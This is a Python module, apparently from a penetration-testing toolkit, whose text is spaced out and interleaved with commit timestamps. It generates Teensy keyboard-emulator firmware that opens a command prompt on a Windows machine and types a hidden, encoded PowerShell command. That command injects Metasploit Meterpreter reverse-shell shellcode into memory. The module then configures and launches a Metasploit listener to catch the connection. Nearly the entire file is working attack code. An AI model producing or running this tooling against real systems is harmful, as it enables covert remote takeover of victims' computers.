2012-12-31 22:11:37 +00:00
#!/usr/bin/python
import pexpect
from src . core . setcore import yesno_prompt
print """
The powershell - shellcode injection leverages powershell to send a meterpreter session straight into memory without ever touching disk .
This technique was introduced by Matthew Graeber ( http : / / www . exploit - monday . com / 2011 / 10 / exploiting - powershells - features - not . html )
"""
payload = raw_input ( " Select payload you want to delivery via the powershell - shellcode injection \n \n 1. Metasploit Meterpreter (x86) \n 2. Metasploit Meterpreter (x64) \n \n Enter your choice: " )
if payload == " " : payload = " 2 "
if payload == " 1 " :
path = " src/program_junk/x86.powershell "
payload = " windows/meterpreter/reverse_tcp "
if payload == " 2 " :
path = " src/program_junk/x64.powershell "
payload = " windows/x64/meterpreter/reverse_tcp "
# create base metasploit payload to pass to powershell.prep
filewrite = file ( " src/program_junk/metasploit.payload " , " w " )
filewrite . write ( payload )
filewrite . close ( )
import src . payloads . powershell . prep
fileopen = file ( path , " r " )
#payload_encoded = fileopen.read()
# read in x amount of bytes
data_read = int ( 50 )
output_variable = " #include <avr/pgmspace.h> \n "
counter = 0
while 1 :
reading_encoded = fileopen . read ( data_read ) . rstrip ( )
if reading_encoded == " " : break
output_variable + = ' prog_char RevShell_ %s [] PROGMEM = " %s " ; \n ' % ( counter , reading_encoded )
counter = counter + 1
rev_counter = 0
output_variable + = " PROGMEM const char *exploit[] = { \n "
while rev_counter != counter :
output_variable + = " RevShell_ %s " % rev_counter
rev_counter = rev_counter + 1
if rev_counter == counter :
output_variable + = " }; \n "
if rev_counter != counter :
output_variable + = " , \n "
teensy = output_variable
# write the rest of the teensy code
teensy + = ( """
char buffer [ 55 ] ;
int ledPin = 11 ;
void setup ( ) {
pinMode ( ledPin , OUTPUT ) ;
}
void loop ( )
{
BlinkFast ( 2 ) ;
delay ( 5000 ) ;
CommandAtRunBar ( " cmd " ) ;
delay ( 750 ) ;
Keyboard . print ( " powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand " ) ;
/ / Write the binary to the notepad file
int i ;
for ( i = 0 ; i < sizeof ( exploit ) / sizeof ( int ) ; i + + ) {
strcpy_P ( buffer , ( char * ) pgm_read_word ( & ( exploit [ i ] ) ) ) ;
Keyboard . print ( buffer ) ;
delay ( 30 ) ;
}
/ / ADJUST THIS DELAY IF HEX IS COMING OUT TO FAST !
Keyboard . set_key1 ( KEY_ENTER ) ;
Keyboard . send_now ( ) ;
Keyboard . set_key1 ( 0 ) ;
Keyboard . send_now ( ) ;
/ / delay ( 20000 ) ;
/ / Keyboard . println ( " exit " ) ;
delay ( 9000000 ) ;
}
void BlinkFast ( int BlinkRate ) {
int BlinkCounter = 0 ;
for ( BlinkCounter = 0 ; BlinkCounter != BlinkRate ; BlinkCounter + + ) {
digitalWrite ( ledPin , HIGH ) ;
delay ( 80 ) ;
digitalWrite ( ledPin , LOW ) ;
delay ( 80 ) ;
}
}
void AltF4 ( ) {
Keyboard . set_modifier ( MODIFIERKEY_ALT ) ;
Keyboard . set_key1 ( KEY_F4 ) ;
Keyboard . send_now ( ) ;
Keyboard . set_modifier ( 0 ) ;
Keyboard . set_key1 ( 0 ) ;
Keyboard . send_now ( ) ;
}
void CtrlS ( ) {
Keyboard . set_modifier ( MODIFIERKEY_CTRL ) ;
Keyboard . set_key1 ( KEY_S ) ;
Keyboard . send_now ( ) ;
Keyboard . set_modifier ( 0 ) ;
Keyboard . set_key1 ( 0 ) ;
Keyboard . send_now ( ) ;
}
/ / Taken from IronGeek
void CommandAtRunBar ( char * SomeCommand ) {
Keyboard . set_modifier ( 128 ) ;
Keyboard . set_key1 ( KEY_R ) ;
Keyboard . send_now ( ) ;
Keyboard . set_modifier ( 0 ) ;
Keyboard . set_key1 ( 0 ) ;
Keyboard . send_now ( ) ;
delay ( 1500 ) ;
Keyboard . print ( SomeCommand ) ;
Keyboard . set_key1 ( KEY_ENTER ) ;
Keyboard . send_now ( ) ;
Keyboard . set_key1 ( 0 ) ;
Keyboard . send_now ( ) ;
}
void PRES ( int KeyCode ) {
Keyboard . set_key1 ( KeyCode ) ;
Keyboard . send_now ( ) ;
Keyboard . set_key1 ( 0 ) ;
Keyboard . send_now ( ) ;
}
void SPRE ( int KeyCode ) {
Keyboard . set_modifier ( MODIFIERKEY_SHIFT ) ;
Keyboard . set_key1 ( KeyCode ) ;
Keyboard . send_now ( ) ;
Keyboard . set_modifier ( 0 ) ;
Keyboard . set_key1 ( 0 ) ;
Keyboard . send_now ( ) ;
}
""" )
print " [*] Payload has been extracted. Copying file to reports/teensy.pde "
filewrite = file ( " reports/teensy.pde " , " w " )
filewrite . write ( teensy )
filewrite . close ( )
choice = yesno_prompt ( " 0 " , " Do you want to start a listener [yes/no]: " )
if choice == " YES " :
2013-03-14 14:25:10 +00:00
# Open the IPADDR file
if check_options ( " IPADDR= " ) != 0 :
ipaddr = check_options ( " IPADDR= " )
else :
ipaddr = raw_input ( setprompt ( [ " 6 " ] , " IP address to connect back on " ) )
update_options ( " IPADDR= " + ipaddr )
if check_options ( " PORT= " ) != 0 :
port = check_options ( " PORT= " )
else :
port = raw_input ( " Enter the port to connect back on: " )
2012-12-31 22:11:37 +00:00
filewrite = file ( " src/program_junk/metasploit.answers " , " w " )
2013-02-16 22:13:49 +00:00
filewrite . write ( " use multi/handler \n set payload %s \n set LHOST %s \n set LPORT %s \n set AutoRunScript post/windows/manage/smart_migrate \n exploit -j " % ( payload , ipaddr , port ) )
2012-12-31 22:11:37 +00:00
filewrite . close ( )
print " [*] Launching Metasploit.... "
try :
child = pexpect . spawn ( " msfconsole -r src/program_junk/metasploit.answers " )
child . interact ( )
except : pass